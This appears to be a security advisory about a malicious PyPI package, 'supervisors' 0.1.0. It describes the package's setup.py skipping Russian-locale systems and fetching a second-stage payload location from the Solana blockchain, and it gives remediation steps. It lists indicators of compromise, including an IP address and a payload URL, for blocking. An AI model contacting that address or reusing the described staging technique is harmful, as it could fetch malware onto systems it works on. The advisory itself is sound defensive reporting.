Malicious `supervisors` PyPI release fetches payload via Solana
TL;DR — A malicious PyPI package (supervisors 0.1.0) runs during installation and pulls second-stage payload location data from the Solana blockchain, indicating a supply-chain compromise path.
What happened
OSV (Open Source Vulnerabilities) published an alert for MAL-2026-2448, flagging the PyPI package supervisors as containing malicious code.
Per the OSV record, the package’s setup.py contains malicious logic that skips execution when the system language is Russian, and otherwise attempts to retrieve a next-stage payload URL from the Solana blockchain using a wallet ID associated with the “Glossworm” campaign.
The report notes the final payload was not accessible during analysis, and states this “strongly suggests the owner's account was hijacked.” It also points to a likely code origin in a previously hijacked project template (HydroRoll-Team/pyo3-project-template).
This matters because setup.py execution happens in developer and CI/CD contexts (where secrets and tokens are commonly present), and blockchain-backed staging can make takedowns and tracking harder than conventional hosted payload infrastructure.
Who is impacted
- Any environment that installed PyPI package
supervisorsversion0.1.0. - Developer workstations and CI builders are highest risk due to build-time secret exposure.
| Component | Ecosystem | Affected versions (per OSV) |
|---|---|---|
supervisors | PyPI | 0.1.0 |
What to do now
- Identify whether
supervisors0.1.0exists anywhere in your estate (lockfiles, internal mirrors, build logs, artifact manifests) and remove/quarantine impacted environments. - If the package was installed on CI runners or build agents, treat it as a potential build-time compromise: review pipeline logs and rotate credentials that may have been available to the build context.
- Add detection/egress controls for the OSV-listed network indicators (as appropriate for your environment):
- IP:
217.69.2.135 - URL:
http://217.69.2.135/NrIgZ6I%2BFyCxXHb%2B9FapRg%3D%3D
- IP:
- Review dependency allowlists / artifact proxy policies for PyPI to reduce exposure to typosquats / malicious new packages, especially “first release” packages with no established maintainer history.
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.